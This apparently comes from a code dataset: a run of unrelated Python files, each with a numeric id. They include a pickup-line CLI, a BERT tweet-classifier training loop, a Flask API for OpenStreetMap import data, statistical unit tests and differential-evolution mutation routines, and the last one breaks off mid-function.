|
502603 | import argparse
import pyperclip
from .pickuplinesgalore import PickuplinesGalore
from .pickuplinegen import Pickuplinegen
def say_sorry():
print("Sorry buddy! couldn't found any pickupline ¯\_(ツ)_/¯")
def run(args):
if args.list:
pick = PickuplinesGalore()
print("\n".join(pick.get_list_of_categories()))
return
line = None
if args.keyword:
pick = PickuplinesGalore()
line = pick.get_pickupline(args.keyword)
if not line:
say_sorry()
elif args.random:
pick = Pickuplinegen()
line = pick.get_pickupline()
if not line:
say_sorry()
if line:
print(line)
pyperclip.copy(line)
else:
print("try pickup-line --help for more info")
def init():
parser = argparse.ArgumentParser(description="A CLI tool for generating PickupLine from web",
epilog="the pickup-line will be copied to the clipboard",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-r', '--random', action='store_true', help="get a random pickupline")
parser.add_argument('-k', '--keyword', help="""Search pickuplines by keyword.
Example:
    pickup-line -k trump
    pickup-line --keyword geek
    pickup-line --keyword scifi
    pickup-line -k dirty
""")
parser.add_argument('-l', '--list', action="store_true", help="list all existing categories")
args = parser.parse_args()
return args
def main():
args = init()
try:
run(args)
except KeyboardInterrupt:
print("Error:Interrupted by user !!!") |
502606 | from virtool.users.fake import create_fake_bob_user
async def test_create_fake_bob_user(snapshot, app, dbi, static_time, mocker):
mocker.patch("virtool.db.utils.get_new_id", return_value="abc123")
await create_fake_bob_user(app)
assert await dbi.users.find_one({}, {"password": False}) == snapshot
|
502690 | from typing import Optional
from mstrio.utils.helper import Dictable
class Node(Dictable):
def __init__(self, name: str, address: Optional[str] = None,
service_control: Optional[bool] = None) -> None:
self.name = name
self.address = address
self.service_control = service_control
|
502850 | from plex.lib.six.moves.urllib_parse import urlparse as std_urlparse
def try_convert(value, value_type, default=None):
try:
return value_type(value)
except ValueError:
return default
except TypeError:
return default
def urlparse(url):
scheme = None
scheme_pos = url.find('://')
if scheme_pos != -1:
scheme = url[:scheme_pos]
url = url[scheme_pos + 1:]
return scheme, std_urlparse(url)
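# Behaviour sketch (illustrative inputs, not exercised by the plugin itself):
#
#     try_convert("42", int)        # -> 42
#     try_convert("n/a", int, 0)    # -> 0   (ValueError is swallowed)
#
#     urlparse("http://host:32400/library")
#     # -> ('http', ParseResult(scheme='', netloc='host:32400', path='/library', ...))
#     # The scheme is split off by hand, so the remainder keeps its '//netloc'
#     # form for the standard parser.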
|
502926 | import math
import numpy as np
import string
import random
import json
import argparse
import torch as T
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from transformers import *
import sys
sys.path.append("../")
from DataLoader.bucket_and_batch import bucket_and_batch
from model.BERT_NL import Encoder as BERT_NL_Encoder
from model.BERT_BiLSTM import Encoder as BERT_BiLSTM_Encoder
from model.BERT_BiLSTM_attn import Encoder as BERT_BiLSTM_attn_Encoder
from model.BERT_attn_BiLSTM import Encoder as BERT_attn_BiLSTM_Encoder
from model.BERT_attn_BiLSTM_attn import Encoder as BERT_attn_BiLSTM_attn_Encoder
from model.BERT_capsule_BiLSTM_attn import Encoder as BERT_capsule_BiLSTM_attn_Encoder
from model.BERT_capsule_BiLSTM_capsule import Encoder as BERT_capsule_BiLSTM_capsule_Encoder
from model.BERT_capsule import Encoder as BERT_capsule_Encoder
import modules.utils as utils
import modules.eval as eval
parser = argparse.ArgumentParser(description='Model Name')
parser.add_argument('--model', type=str, default="BERT_capsule")
flags = parser.parse_args()
model_name = flags.model
print("\n\nTraining Model: {}\n\n".format(model_name))
model_dict = {'BERT_NL': BERT_NL_Encoder,
'BERT_BiLSTM': BERT_BiLSTM_Encoder,
'BERT_BiLSTM_attn': BERT_BiLSTM_attn_Encoder,
'BERT_attn_BiLSTM': BERT_attn_BiLSTM_Encoder,
'BERT_attn_BiLSTM_attn': BERT_attn_BiLSTM_attn_Encoder,
'BERT_capsule_BiLSTM_attn': BERT_capsule_BiLSTM_attn_Encoder,
'BERT_capsule_BiLSTM_capsule': BERT_capsule_BiLSTM_capsule_Encoder,
'BERT_capsule': BERT_capsule_Encoder}
Encoder = model_dict.get(model_name, BERT_BiLSTM_Encoder)
device = T.device('cuda' if T.cuda.is_available() else 'cpu')
# print(device)
if device == T.device('cuda'):
T.set_default_tensor_type(T.cuda.FloatTensor)
else:
T.set_default_tensor_type(T.FloatTensor)
random.seed(101)
bnb = bucket_and_batch()
if 'capsule' in model_name:
val_batch_size = 4
train_batch_size = 4
else:
val_batch_size = 8
train_batch_size = 8
accu_step = 64 // train_batch_size
max_grad_norm = 2
with open('../Processed_Data/train_data.json') as file:
data = json.load(file)
train_texts = data["tweets"]
train_labels = data["labels"]
train_binary_labels = data["binary_labels"]
with open('../Processed_Data/val_data.json') as file:
data = json.load(file)
val_texts = data["tweets"]
val_labels = data["labels"]
val_binary_labels = data["binary_labels"]
with open('../Processed_Data/label_info.json') as file:
data = json.load(file)
labels2idx = data["labels2idx"]
binary_labels2idx = data["binary_labels2idx"]
label_weights = data["label_weights"]
binary_label_weights = data["binary_label_weights"]
idx2labels = {v: k for k, v in labels2idx.items()}
binary_idx2labels = {v: k for k, v in binary_labels2idx.items()}
label_weights_idx = [i for i in range(len(labels2idx))]
label_weights = [label_weights[idx2labels[id]] for id in label_weights_idx]
label_weights = T.tensor(label_weights).to(device)
binary_label_weights_idx = [0, 1]
binary_label_weights = [binary_label_weights[binary_idx2labels[id]]
for id in binary_label_weights_idx]
binary_label_weights = T.tensor(binary_label_weights).to(device)
model = Encoder(classes_num=len(labels2idx))
model = model.to(device)
parameter_count = sum(p.numel() for p in model.parameters() if p.requires_grad)
print("Parameter Count: ", parameter_count)
parameters = []
BERT_parameters = []
allowed_layers = [11, 10, 9, 8, 7, 6]
for name, param in model.named_parameters():
if "BERT" not in name:
parameters.append(param)
print(name)
print(param.size())
else:
for layer_num in allowed_layers:
layer_num = str(layer_num)
if ".{}.".format(layer_num) in name:
BERT_parameters.append(param)
print(name)
print(param.size())
break
optimizer = T.optim.AdamW([{'params': parameters},
{'params': BERT_parameters, 'lr': 2e-5}
], lr=1e-3, weight_decay=0)
def lambda1(epoch): return (1 / 10)**epoch
def lambda2(epoch): return (1 / 10)**epoch
scheduler = T.optim.lr_scheduler.LambdaLR(optimizer, [lambda1, lambda2])
def display(texts, predictions, labels, binary_predictions, binary_labels, label_masks):
global idx2labels
global binary_idx2labels
N = len(texts)
j = random.choice(np.arange(N).tolist())
display_text = texts[j]
display_prediction = idx2labels[predictions[j]]
display_gold = idx2labels[labels[j]]
if label_masks[j] == 0:
        display_prediction = display_prediction + " (N/A)"
display_gold = "(unlabeled)"
display_binary_prediction = binary_idx2labels[binary_predictions[j]]
display_binary_gold = binary_idx2labels[binary_labels[j]]
print("\n\nExample Prediction\n")
print("Text: {}\n".format(display_text))
print("Prediction: {}, Gold: {}, Binary Prediction: {}, Binary Gold: {}\n".format(
display_prediction, display_gold, display_binary_prediction, display_binary_gold))
def predict(text_ids, labels, binary_labels, input_mask, label_mask, train=True):
global model
global label_weights
global binary_label_weights
with T.no_grad():
text_ids = T.tensor(text_ids).long().to(device)
labels = T.tensor(labels).long().to(device)
binary_labels = T.tensor(binary_labels).long().to(device)
input_mask = T.tensor(input_mask).float().to(device)
label_mask = T.tensor(label_mask).float().to(device)
if train:
model = model.train()
binary_logits, logits = model(text_ids, input_mask)
else:
model = model.eval()
binary_logits, logits = model(text_ids, input_mask)
# print(binary_logits.detach().cpu().numpy())
binary_predictions = np.where(binary_logits.view(-1).detach().cpu().numpy() > 0.5, 1, 0)
predictions = T.argmax(logits, dim=-1).detach().cpu().numpy()
loss = utils.cross_entropy(model, logits, labels, binary_logits, binary_labels,
label_weights, binary_label_weights, label_mask)
T.cuda.empty_cache()
return predictions, binary_predictions, loss
epochs = 100
val_batches_texts, val_batches_text_ids, \
val_batches_labels, val_batches_binary_labels, \
val_batches_mask, val_batches_label_masks = bnb.bucket_and_batch(
val_texts, val_labels, val_binary_labels, labels2idx, binary_labels2idx, val_batch_size, train=False)
print("Validation batches loaded")
train_batches_texts, train_batches_text_ids, \
train_batches_labels, train_batches_binary_labels, \
train_batches_mask, train_batches_label_masks = bnb.bucket_and_batch(
train_texts, train_labels, train_binary_labels, labels2idx, binary_labels2idx, train_batch_size)
print("Train batches loaded")
display_step = 100
example_display_step = 500
patience = 5
load = input("\nLoad checkpoint? y/n: ")
print("")
if load.lower() == 'y':
print('Loading pre-trained weights for the model...')
checkpoint = T.load("../Model_Backup/{}.pt".format(model_name))
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
past_epoch = checkpoint['past epoch']
best_val_F1 = checkpoint['best F1']
best_val_cost = checkpoint['best loss']
impatience = checkpoint['impatience']
meta_impatience = checkpoint['meta_impatience']
print('\nRESTORATION COMPLETE\n')
else:
past_epoch = 0
best_val_cost = math.inf
best_val_F1 = -math.inf
impatience = 0
meta_impatience = 0
for epoch in range(past_epoch, epochs):
batches_indices = [i for i in range(0, len(train_batches_texts))]
random.shuffle(batches_indices)
total_train_loss = 0
total_F1 = 0
for i in range(len(train_batches_texts)):
j = int(batches_indices[i])
# with T.autograd.detect_anomaly():
predictions, binary_predictions, loss = predict(text_ids=train_batches_text_ids[j],
labels=train_batches_labels[j],
binary_labels=train_batches_binary_labels[j],
input_mask=train_batches_mask[j],
label_mask=train_batches_label_masks[j],
train=True)
loss = loss/accu_step
loss.backward()
if (i+1) % accu_step == 0:
# Update accumulated gradients
T.nn.utils.clip_grad_norm_(parameters+BERT_parameters, max_grad_norm)
optimizer.step()
optimizer.zero_grad()
labels = train_batches_labels[j].tolist()
binary_labels = train_batches_binary_labels[j].tolist()
predictions = predictions.tolist()
binary_predictions = binary_predictions.tolist()
label_masks = train_batches_label_masks[j].tolist()
binary_prec, binary_rec, binary_acc = eval.binary_metrics(binary_predictions, binary_labels)
prec, rec, acc = eval.multi_metrics(predictions, labels, label_masks, idx2labels)
binary_F1 = eval.compute_F1(binary_prec, binary_rec)
F1 = eval.compute_F1(prec, rec)
cost = loss.item()
if i % display_step == 0:
print("Iter "+str(i)+", Cost = " +
"{:.3f}".format(cost)+", Binary F1 = " +
"{:.3f}".format(binary_F1)+", Multi-F1 = " +
"{:.3f}".format(F1)+", Binary Accuracy = " +
"{:.3f}".format(binary_acc)+", Accuracy = " +
"{:.3f}".format(acc))
if i % example_display_step == 0:
display(train_batches_texts[j],
predictions, labels,
binary_predictions, binary_labels,
label_masks)
print("\n\n")
total_val_cost = 0
batch_labels = []
batch_binary_labels = []
batch_predictions = []
batch_binary_predictions = []
batch_label_masks = []
for i in range(0, len(val_batches_texts)):
if i % display_step == 0:
print("Validating Batch {}".format(i+1))
with T.no_grad():
predictions, binary_predictions, loss = predict(text_ids=val_batches_text_ids[i],
labels=val_batches_labels[i],
binary_labels=val_batches_binary_labels[i],
input_mask=val_batches_mask[i],
label_mask=val_batches_label_masks[i],
train=False)
cost = loss.item()
total_val_cost += cost
predictions = predictions.tolist()
binary_predictions = binary_predictions.tolist()
labels = val_batches_labels[i].tolist()
binary_labels = val_batches_binary_labels[i].tolist()
label_masks = val_batches_label_masks[i].tolist()
batch_labels += labels
batch_binary_labels += binary_labels
batch_predictions += predictions
batch_binary_predictions += binary_predictions
batch_label_masks += label_masks
if i % example_display_step == 0:
display(val_batches_texts[i],
predictions, labels,
binary_predictions, binary_labels,
label_masks)
binary_prec, binary_rec, binary_acc = eval.binary_metrics(batch_binary_predictions,
batch_binary_labels)
prec, rec, acc = eval.multi_metrics(
batch_predictions, batch_labels, batch_label_masks, idx2labels)
binary_val_F1 = eval.compute_F1(binary_prec, binary_rec)
val_F1 = eval.compute_F1(prec, rec)
val_len = len(val_batches_texts)
avg_val_cost = total_val_cost/val_len
print("\n\nVALIDATION\n\n")
print("Epoch "+str(epoch)+":, Cost = " +
"{:.3f}".format(avg_val_cost)+", Binary F1 = " +
"{:.3f}".format(binary_val_F1)+", Multi-F1 = " +
"{:.3f}".format(val_F1)+", Binary Accuracy = " +
"{:.3f}".format(binary_acc)+", Accuracy = " +
"{:.3f}".format(acc))
flag = 0
impatience += 1
if avg_val_cost < best_val_cost:
impatience = 0
best_val_cost = avg_val_cost
if val_F1 >= best_val_F1:
impatience = 0
best_val_F1 = val_F1
flag = 1
if flag == 1:
T.save({
'past epoch': epoch+1,
'best loss': best_val_cost,
'best F1': best_val_F1,
'impatience': impatience,
'meta_impatience': meta_impatience,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'scheduler_state_dict': scheduler.state_dict(),
}, "../Model_Backup/{}.pt".format(model_name))
print("Checkpoint created!")
print("\n")
if impatience > patience:
scheduler.step()
meta_impatience += 1
if meta_impatience > 1:
break
|
502994 | title = "All my commands, peko!"
description = "If you have any problems with me, feel free to contact the creator on Discord (bemxio#5847) or on Reddit (u/bemxioo) peko!"
invite = "Here's my invite link peko! https://discord.com/api/oauth2/authorize?client_id=817481976797069383&permissions=116736&scope=bot"
dm_check = "Check your DMs peko!"
help = {
"helpeko": {
"usage": "!helpeko",
"description": "Sends you all of this onto your DMs!"
},
"pekofy": {
"usage": "!pekofy",
"description": "Pekofies the message that you replied to, making it sound like a certain rabbit war criminal..."
},
"pekopasta": {
"usage": "!pekopasta",
"description": "Summons a Pekora cosplay copypasta onto the current channel."
},
"insult me peko": {
"usage": "insult me peko",
"description": "Insults you, feeding your masochistic tendencies, peko~"
},
"credits": {
"usage": "!credits",
"description": "Sends you a list of all the people who helped make me exist!"
},
"invite": {
"usage": "!invite",
"description": "Sends you a link to invite me to your server!"
}
}
credits = """```
First of all, thanks to Heroku, for making me have a little place to live on peko!
Thank you, denki, for helping with my verification peko, so that I could join more than 100 servers!
and thank you, all of you that are reading this, for using me and having fun with me! I love you all peko! <3
- pekofy_bot
```""" |
503014 | import re
from datetime import datetime, timedelta
import json
from flask import request, Response
from flask_restful import Resource, abort
from lxml import etree
from common import util
from common import objects
class Processes(Resource):
"""Lists processes (data update)."""
def get(self):
list_of_processes = objects.processes.status()
return {'processes': [p.as_dict() for p in list_of_processes]}
class Exclude(Resource):
"""Endpoint for reporting addresses or buildings that are not fit for import into OSM."""
def post(self):
r = request.get_json()
exclude_prg_addresses = r.get('exclude_prg_addresses')
exclude_bdot_buildings = r.get('exclude_bdot_buildings')
geojson_geometry_string = r.get('geom')
if geojson_geometry_string:
if exclude_prg_addresses:
objects.addresses.report_addresses_in_polygon(geojson_geometry_string)
if exclude_bdot_buildings:
objects.buildings.report_buildings_in_polygon(geojson_geometry_string)
return {}, 201
else:
# keep old path for compatibility
prg_counter, lod1_counter = 0, 0
if r.get('prg_ids'):
prg_ids = r['prg_ids']
objects.addresses.report_addresses(prg_ids)
prg_counter = len(prg_ids)
if r.get('bdot_ids'):
bdot_ids = r['bdot_ids']
objects.buildings.report_buildings(bdot_ids)
lod1_counter = len(bdot_ids)
return {'prg_ids_inserted': prg_counter, 'bdot_ids_inserted': lod1_counter}, 201
class RandomLocation(Resource):
"""Returns random location (lon, lat) while prioritizing (95% chance) areas with a lot of objects to export."""
def get(self):
point = objects.locations.random_location()
return {'lon': point.longitude, 'lat': point.latitude}
class MapboxVectorTile(Resource):
"""Returns vector tile (MVT) with data which can be displayed on the map."""
def get(self, z: int, x: int, y: int):
tile = objects.tiles.select(z, x, y)
if tile is None:
if 6 <= int(z) <= 14:
objects.tiles.generate_if_not_exists(z, x, y)
else:
abort(404)
tile = objects.tiles.select(z, x, y)
mvt = tile.data if tile is not None else abort(500)
# prepare and return response
response = Response(mvt, status=200, content_type='application/x-protobuf')
if 6 <= int(z) < 9:
response.headers['X-Accel-Expires'] = '120'
elif 10 <= int(z) < 23:
response.headers['X-Accel-Expires'] = '60'
return response
class MarkTileForReload(Resource):
"""Marks MVT to be reloaded with next data update."""
def get(self, z: int, x: int, y: int):
objects.tiles.queue_for_reload(z, x, y)
return 'OK', 201
class AvailableLayers(Resource):
"""Provides list of ids of available layers with data to download."""
def get(self):
return {
'available_layers': objects.layers.Layers().active_ids_with_names
}
class JosmData(Resource):
"""Returns data for given area as an osm file."""
def get(self):
geojson_geometry_string = ''
layers = objects.layers.Layers()
selected_layers = layers.selected_layers(request.args.get('layers', ''))
if len(selected_layers) == 0:
abort(400)
if request.args.get('filter_by') == 'bbox':
bbox = (
float(request.args.get('xmin')), float(request.args.get('ymin')),
float(request.args.get('xmax')), float(request.args.get('ymax'))
)
geojson_geometry_string = json.dumps(util.bbox_to_geojson_geometry(bbox))
elif request.args.get('filter_by') == 'geojson_geometry':
geojson_geometry_string = request.args.get('geom')
# todo: validate geometry
elif request.args.get('filter_by') == 'osm_boundary':
if request.args.get('teryt_terc') and re.match(r'^\d{2,7}$', request.args.get('teryt_terc')):
terc = request.args.get('teryt_terc')
geojson_geometry_string = objects.osm_admin_boundaries.select_where_terc(terc_code=terc)[0].value
elif request.args.get('teryt_simc') and re.match(r'^\d{7}$', request.args.get('teryt_simc')):
simc = request.args.get('teryt_simc')
geojson_geometry_string = objects.osm_admin_boundaries.select_where_simc(simc_code=simc)[0].value
elif request.args.get('relation_id') and re.match(r'^\d+$', request.args.get('relation_id')):
relation_id = int(request.args.get('relation_id'))
geojson_geometry_string = objects.osm_admin_boundaries.select_where_id(relation_id=relation_id)[0].value
else:
abort(400)
else:
abort(400)
data = objects.layers.select_data_for_layers([(layer, {'geojson_geometry': geojson_geometry_string}) for layer in selected_layers])
list_of_features = [values for layer_id, layer_data in data.items() for values in layer_data.data]
root = util.create_osm_xml(list_of_features)
package_export_params = {'geojson_geometry': geojson_geometry_string}
for layer_id, layer_data in data.items():
if layers[layer_id].export_parameter_name:
package_export_params[layers[layer_id].export_parameter_name] = layer_data.count
required_parameters = ['lb_adresow', 'lb_budynkow']
for param in required_parameters:
if package_export_params.get(param) is None:
package_export_params[param] = 0
objects.layers.register_export(**package_export_params)
return Response(
etree.tostring(root, encoding='UTF-8'),
mimetype='text/xml',
headers={'Content-disposition': 'attachment; filename=paczka_danych.osm'})
class LatestUpdates(Resource):
"""Returns areas that has recently been updated in OSM or areas that were exported as JOSM data package."""
def get(self):
ts = request.args.get('after')
if ts is None:
ts = datetime.now() - timedelta(minutes=60)
else:
try:
ts = datetime.fromisoformat(ts)
            except ValueError:
abort(400)
if ts - datetime.now() > timedelta(hours=24, minutes=5):
abort(400)
list_of_updates = objects.updates.latest_updates(ts)
list_of_geometries = [u.area for u in list_of_updates]
list_of_properties = [
{'dataset': u.dataset, 'created_at': u.created_at, 'changesets': u.changesets} for u in list_of_updates
]
response_dict = util.create_geojson_dict(list_of_geometries, list_of_properties)
# prepare and return response
expiry_time = ts + timedelta(seconds=60)
response = Response(
response=json.dumps(response_dict),
status=200,
content_type='application/geo+json',
headers={
'X-Accel-Expires': '60',
'Expires': expiry_time.strftime("%a, %d %b %Y %H:%M:%S GMT"),
}
)
return response
|
503124 | import json
corpus = {}
with open("final.json","r") as fh:
corpus = json.load(fh)
act_tags = []
topics = []
for season_episode in corpus:
season,episode = season_episode.split("_")
for scene in corpus[season_episode]:
for turn in scene["Turns"]:
print(turn["Speaker"])
if turn["Act_Tag"][0] not in act_tags:
act_tags.append(turn["Act_Tag"][0])
if turn["Topics"]:
for t in turn["Topics"]:
if t not in topics:
topics.append(t)
with open("info.json","w") as fh:
json.dump(act_tags,fh)
with open("info1.json","w") as fh:
json.dump(topics,fh) |
503156 | import unittest
import numpy as np
import scipy.stats as st
from ..data import Vector
from ..analysis import TwoSampleKSTest
from ..analysis.exc import MinimumSizeError, NoDataError
class TestTwoSampleKS(unittest.TestCase):
def test_two_sample_KS_matched(self):
"""Test the Two Sample KS Test with matched samples"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
alpha = 0.05
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0500
D value = 0.2000
p value = 0.7710
H0: Both samples come from the same distribution
"""
self.assertGreater(exp.p_value, alpha, "FAIL: Two Sample KS Test Type I error")
self.assertEqual(str(exp), output)
def test_two_sample_KS_unmatched(self):
"""Test the Two Sample KS Test with unmatched samples"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [8.2]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
alpha = 0.06
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0600
D value = 0.4000
p value = 0.0591
HA: Samples do not come from the same distribution
"""
self.assertLess(exp.p_value, alpha, "FAIL: Two Sample KS Test Type II error")
self.assertEqual(str(exp), output)
def test_two_sample_KS_statistic(self):
"""Test the Two Sample KS Test test statistic"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
alpha = 0.05
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False)
self.assertAlmostEqual(exp.statistic, 0.2, delta=0.1, msg="FAIL: Two Sample KS Test statistic")
self.assertAlmostEqual(exp.d_value, 0.2, delta=0.1, msg="FAIL: Two Sample KS Test d_value")
self.assertAlmostEqual(exp.p_value, 0.771, delta=0.001, msg="FAIL: Two Sample KS Test p_value")
def test_two_sample_KS_matched_at_min_size(self):
"""Test the Two Sample KS Test with matched samples at the minimum size"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=2)
y_input = st.weibull_min.rvs(*y_parms, size=2)
alpha = 0.05
self.assertRaises(MinimumSizeError, lambda: TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False))
def test_two_sample_KS_matched_just_above_min_size(self):
"""Test the Two Sample KS Test with matched samples just above the minimum size"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=3)
y_input = st.weibull_min.rvs(*y_parms, size=3)
alpha = 0.05
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=True)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0500
D value = 0.6667
p value = 0.3197
H0: Both samples come from the same distribution
"""
self.assertAlmostEqual(exp.p_value, 0.3197, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.6667, delta=0.0001)
self.assertEqual(str(exp), output)
def test_two_sample_KS_matched_empty(self):
"""Test the Two Sample KS Test with empty vectors"""
np.random.seed(987654321)
x_input = [np.nan, np.nan, "one", np.nan]
y_input = ["one", "two", "three", "four"]
alpha = 0.05
self.assertRaises(NoDataError, lambda: TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False))
def test_two_sample_KS_vector_input(self):
"""Test the Two Sample KS Test with a Vector object."""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
vector = Vector(x_input).append(Vector(y_input))
alpha = 0.05
exp = TwoSampleKSTest(vector, alpha=alpha, display=False)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0500
D value = 0.2000
p value = 0.7710
H0: Both samples come from the same distribution
"""
self.assertGreater(exp.p_value, alpha, "FAIL: Two Sample KS Test Type I error")
self.assertEqual(str(exp), output)
def test_two_sample_KS_with_missing_second_arg(self):
"""Test the case where the second argument is None."""
np.random.seed(987654321)
x_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
self.assertRaises(AttributeError, lambda: TwoSampleKSTest(x_input))
if __name__ == '__main__':
unittest.main()
|
503164 | import numpy as np
from typing import Callable, Union, List, Tuple, Any
def keep_bounds(population: np.ndarray,
bounds: np.ndarray) -> np.ndarray:
"""
Constrains the population to its proper limits.
    Any value outside its bounded range is clipped.
:param population: Current population that may not be constrained.
:type population: np.ndarray
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype np.ndarray
:return: Population constrained within its bounds.
"""
minimum = [bound[0] for bound in bounds]
maximum = [bound[1] for bound in bounds]
return np.clip(population, minimum, maximum)
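# Quick illustration (hypothetical values): clipping is applied per gene, each
# column against its own (min, max) pair.
#
#     keep_bounds(np.array([[5.0, -3.0]]), np.array([(0, 1), (-1, 1)]))
#     # -> array([[ 1., -1.]])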
def init_population(population_size: int, individual_size: int,
bounds: Union[np.ndarray, list]) -> np.ndarray:
"""
Creates a random population within its constrained bounds.
:param population_size: Number of individuals desired in the population.
:type population_size: int
:param individual_size: Number of features/gens.
:type individual_size: int
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: Union[np.ndarray, list]
:rtype: np.ndarray
:return: Initialized population.
"""
population = np.random.randn(population_size, individual_size)
return keep_bounds(population, bounds)
def apply_fitness(population: np.ndarray,
func: Callable[[np.ndarray], float],
opts: Any) -> np.ndarray:
"""
Applies the given fitness function to each individual of the population.
:param population: Population to apply the current fitness function.
:type population: np.ndarray
:param func: Function that is used to calculate the fitness.
:type func: np.ndarray
:param opts: Optional parameters for the fitness function.
:type opts: Any type.
:rtype np.ndarray
:return: Numpy array of fitness for each individual.
"""
if opts is None:
return np.array([func(individual) for individual in population])
else:
return np.array([func(individual, opts) for individual in population])
def __parents_choice(population: np.ndarray, n_parents: int) -> np.ndarray:
pob_size = population.shape[0]
choices = np.indices((pob_size, pob_size))[1]
mask = np.ones(choices.shape, dtype=bool)
np.fill_diagonal(mask, 0)
choices = choices[mask].reshape(pob_size, pob_size - 1)
parents = np.array([np.random.choice(row, n_parents, replace=False) for row in choices])
return parents
def binary_mutation(population: np.ndarray,
f: Union[int, float],
bounds: np.ndarray) -> np.ndarray:
"""
Calculate the binary mutation of the population. For each individual (n),
3 random parents (x,y,z) are selected. The parents are guaranteed to not
be in the same position than the original. New individual are created by
n = z + F * (x-y)
:param population: Population to apply the mutation
:type population: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: Union[int, float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) <= 3:
return population
# 1. For each number, obtain 3 random integers that are not the number
parents = __parents_choice(population, 3)
# 2. Apply the formula to each set of parents
mutated = f * (population[parents[:, 0]] - population[parents[:, 1]])
mutated += population[parents[:, 2]]
return keep_bounds(mutated, bounds)
def current_to_best_2_binary_mutation(population: np.ndarray,
population_fitness: np.ndarray,
f: Union[int, float],
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to best/2/bin" mutation. This is
    V_{i, G} = X_{i, G} + F * (X_{best, G} - X_{i, G}) + F * (X_{r1, G} - X_{r2, G})
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: Union[int, float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) < 3:
return population
# 1. We find the best parent
best_index = np.argmin(population_fitness)
# 2. We choose two random parents
parents = __parents_choice(population, 2)
mutated = population + f * (population[best_index] - population)
mutated += f * (population[parents[:, 0]] - population[parents[:, 1]])
return keep_bounds(mutated, bounds)
def current_to_pbest_mutation(population: np.ndarray,
population_fitness: np.ndarray,
f: List[float],
p: Union[float, np.ndarray, int],
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to p-best" mutation. This is
    V_{i, G} = X_{i, G} + F * (X_{p_best, G} - X_{i, G}) + F * (X_{r1, G} - X_{r2, G})
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: Union[int, float]
    :param p: Percentage of population that can be a p-best. Must be in (0, 1).
:type p: Union[int, float, np.ndarray]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) < 4:
return population
# 1. We find the best parent
p_best = []
for p_i in p:
best_index = np.argsort(population_fitness)[:max(2, int(round(p_i*len(population))))]
p_best.append(np.random.choice(best_index))
p_best = np.array(p_best)
# 2. We choose two random parents
parents = __parents_choice(population, 2)
mutated = population + f * (population[p_best] - population)
mutated += f * (population[parents[:, 0]] - population[parents[:, 1]])
return keep_bounds(mutated, bounds)
def current_to_rand_1_mutation(population: np.ndarray,
population_fitness: np.ndarray,
k: List[float],
f: List[float],
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to rand/1" mutation. This is
    U_{i, G} = X_{i, G} + K * (X_{r1, G} - X_{i, G}) + F * (X_{r2, G} - X_{r3, G})
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
    :param k: Combination coefficient with the random individual. Must be in [0, 2].
    :type k: List[float]
    :param f: Parameter of control of the mutation. Must be in [0, 2].
    :type f: List[float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) <= 3:
return population
# 1. For each number, obtain 3 random integers that are not the number
parents = __parents_choice(population, 3)
# 2. Apply the formula to each set of parents
